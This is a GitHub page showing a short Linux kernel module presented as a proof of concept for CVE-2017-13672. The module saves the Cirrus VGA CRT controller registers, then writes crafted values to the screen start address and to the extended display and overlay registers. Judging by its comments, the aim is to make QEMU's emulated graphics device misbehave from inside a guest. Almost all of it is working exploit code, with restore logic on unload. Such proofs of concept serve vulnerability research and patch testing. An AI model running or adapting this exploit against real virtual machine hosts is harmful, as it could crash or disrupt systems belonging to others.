Permalink
Cannot retrieve contributors at this time
Join GitHub today
GitHub is home to over 28 million developers working together to host and review code, manage projects, and build software together.
Sign up
Fetching contributors…
Cannot retrieve contributors at this time
| #define LINUX | |
| #include <linux/module.h> | |
| #include <linux/kernel.h> | |
| #include <linux/init.h> | |
| #include <asm/io.h> | |
| #define DRIVER_AUTHOR "David Buchanan" | |
| #define DRIVER_DESC "CVE-2017-13672 POC" | |
| /* From qemu/hw/display/vga_regs.h */ | |
| #define VGA_CRT_IC 0x3D4 /* CRT Controller Index - color emulation */ | |
| #define VGA_CRT_DC 0x3D5 /* CRT Controller Data Register - color emulation */ | |
| /* From CL-GD5446 Technical Reference Manual */ | |
| #define VGA_CRC 0x0C /* CRTC Screen Start Address High Register */ | |
| #define VGA_CRD 0x0D /* CRTC Screen Start Address Low Register */ | |
| #define VGA_CR1B 0x1B /* Extended Display Controls Register */ | |
| #define VGA_CR1D 0x1D /* Overlay Extended Control Register */ | |
| unsigned char crc_bak, crd_bak, cr1b_bak, cr1d_bak; | |
| unsigned char vga_crt_read(unsigned char reg) { | |
| outb_p(reg, VGA_CRT_IC); | |
| return inb_p(VGA_CRT_DC); | |
| } | |
| void vga_crt_write(unsigned char val, unsigned char reg) { | |
| outb_p(reg, VGA_CRT_IC); | |
| outb_p(val, VGA_CRT_DC); | |
| } | |
| int init_module(void) | |
| { | |
| printk(KERN_ALERT "Attempting to exploit CVE-2017-13672...\n"); | |
| crc_bak = vga_crt_read(VGA_CRC); | |
| crd_bak = vga_crt_read(VGA_CRD); | |
| cr1b_bak = vga_crt_read(VGA_CR1B); | |
| cr1d_bak = vga_crt_read(VGA_CR1D); | |
| vga_crt_write(0xFF, VGA_CRC); | |
| vga_crt_write(0xFF, VGA_CRD); | |
| vga_crt_write(cr1b_bak | 0x0D, VGA_CR1B); | |
| vga_crt_write(cr1d_bak | 0x80, VGA_CR1D); // usually only this bit needs to be set | |
| return 0; | |
| } | |
| void cleanup_module(void) | |
| { | |
| printk("If you got this far, exploitation was unsuccessful. Attempting to unload CVE-2017-13672. This may or may not fix your graphics.\n"); | |
| vga_crt_write(crc_bak, VGA_CRC); | |
| vga_crt_write(crd_bak, VGA_CRD); | |
| vga_crt_write(cr1b_bak, VGA_CR1B); | |
| vga_crt_write(cr1d_bak, VGA_CR1D); | |
| } | |
| MODULE_LICENSE("Dual MIT/GPL"); | |
| MODULE_AUTHOR(DRIVER_AUTHOR); | |
| MODULE_DESCRIPTION(DRIVER_DESC); |